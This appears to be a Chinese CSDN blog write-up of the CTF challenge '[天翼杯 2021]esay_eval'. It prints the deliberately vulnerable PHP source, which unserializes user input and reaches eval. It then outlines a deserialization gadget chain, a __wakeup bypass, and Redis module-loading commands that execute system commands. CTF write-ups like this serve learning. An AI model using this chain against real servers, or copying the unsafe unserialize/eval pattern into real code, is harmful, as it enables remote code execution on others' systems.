[天翼杯 2021]esay_eval

最新推荐文章于 2023-04-18 19:59:50 发布

I·CE

最新推荐文章于 2023-04-18 19:59:50 发布

阅读量357

点赞数

分类专栏：刷题文章标签： php

本文链接：https://blog.csdn.net/qq_61142406/article/details/124991699

版权

刷题专栏收录该内容

12 篇文章 0 订阅

订阅专栏

<?php
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);
        
    }
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    function __destruct(){
        echo $this->a->a();
    }
}
if(isset($_REQUEST['poc'])){
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){   //类名大小写
                exit("you want to bypass wakeup ? no !");
            }
        }
        unserialize($_REQUEST['poc']);    
    }


}else{
    highlight_file(__FILE__);
}

解答：

B(__destruct)->A(__call)
绕过__wakeup
类名大小写
加载蚁剑redis插件
MODULE LOAD "/var/www/html/exp.so"
system.exec "cat /f*"

I·CE

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[天翼杯 2021]esay_eval

<?phpclass A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; }}class B{ function __destruct(){ echo $this->a->a();
复制链接

扫一扫

专栏目录